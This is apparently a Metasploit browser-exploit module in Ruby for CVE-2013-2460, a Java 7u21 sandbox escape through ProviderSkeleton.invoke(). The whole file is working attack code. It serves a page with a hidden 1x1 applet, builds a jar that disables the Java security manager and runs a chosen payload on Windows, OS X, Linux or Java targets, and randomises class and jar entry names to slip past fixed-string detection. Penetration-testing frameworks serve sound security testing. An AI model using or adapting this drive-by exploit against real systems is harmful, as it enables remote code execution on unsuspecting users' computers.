##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
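# Browser exploit module for CVE-2013-2460: the insecure ProviderSkeleton.invoke()
# method in Java 7u21 and earlier. It serves a small HTML page that loads a
# randomly named applet jar built from three pre-built class files shipped in the
# Metasploit data directory plus the selected payload.
class MetasploitModule < Msf::Exploit::Remote
  # GreatRanking: there is no click-to-play bypass, and Java now defaults to
  # the High security level.
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # No JavaScript fingerprinting is needed; the applet tag alone triggers the load.
  autopwn_info({ :javascript => false })

  # Class-name stub present in the shipped Exploit.class bytecode. `setup`
  # replaces every occurrence with a random alphabetic name of the same length
  # so the served class name is not a fixed string.
  EXPLOIT_STRING = 'Exploit'

  # Subdirectory of the Metasploit data directory holding the three pre-built
  # class files this module serves.
  DATA_SUBDIR = File.join('exploits', 'cve-2013-2460').freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',
        'Description' => %q{
          This module abuses the insecure invoke() method of the ProviderSkeleton class that
          allows to call arbitrary static methods with user supplied arguments. The vulnerability
          affects Java version 7u21 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
        'Platform' => %w{java linux osx win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Replace every occurrence of +identifier+ in the entry names and entry
  # contents of +jar+ with a freshly generated alphabetic string of the same
  # length. Entry names are edited in place; entry data is reassigned.
  #
  # @param jar [Object] built jar exposing #entries, each with #name and #data
  # @param identifier [String] literal substring to replace
  # @return [void]
  def randomize_identifier_in_jar(jar, identifier)
    replacement = rand_text_alpha(identifier.length)
    jar.entries.each do |entry|
      entry.name.gsub!(identifier, replacement)
      entry.data = entry.data.gsub(identifier, replacement)
    end
  end

  # Load the three pre-built class files from the data directory and rename
  # the exploit class before the HTTP server is started by `super`.
  #
  # @raise [Errno::ENOENT] when one of the data files is missing
  def setup
    @exploit_class = read_data_file('Exploit.class')
    @provider_class = read_data_file('ExpProvider.class')
    @action_class = read_data_file('DisableSecurityManagerAction.class')

    # Rewrite the class-name stub inside the bytecode. The same name is used
    # for the jar entry and the applet's `code` attribute, so all three agree.
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)

    super
  end

  # Dispatch one HTTP request: serve the applet jar for any `*.jar` URI,
  # serve the loader page at the resource root, and redirect everything else
  # to the root. Anchors use `\z` rather than `$` so a URI is matched on its
  # true end, not on an embedded line break.
  #
  # @param cli [Object] client connection handed to the send_* helpers
  # @param request [Object] parsed request exposing #uri
  # @return [void]
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar\z/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file('ExpProvider.class', @provider_class)
      jar.add_file('DisableSecurityManagerAction.class', @action_class)
      # Scrub fixed identifiers from entry names and contents before serving.
      randomize_identifier_in_jar(jar, 'metasploit')
      randomize_identifier_in_jar(jar, 'payload')
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/\z}
      # Only the nil check is needed here; avoid shadowing the `payload` method
      # with a local of the same name.
      unless regenerate_payload(cli)
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, "#{get_resource}/", '')
    end
  end

  # Build the minimal loader page: a 1x1 applet whose archive name is a random
  # 3..7 letter string and whose `code` attribute is the randomized exploit class.
  #
  # @return [String] HTML document
  def generate_html
    %Q|
<html>
<body>
<applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</body>
</html>
|
  end

  private

  # Read one of the pre-built class files shipped under the data directory.
  #
  # @param name [String] file name inside the cve-2013-2460 data directory
  # @return [String] raw file bytes (binary read)
  # @raise [Errno::ENOENT] when the file does not exist
  def read_data_file(name)
    File.binread(File.join(Msf::Config.data_directory, DATA_SUBDIR, name))
  end
end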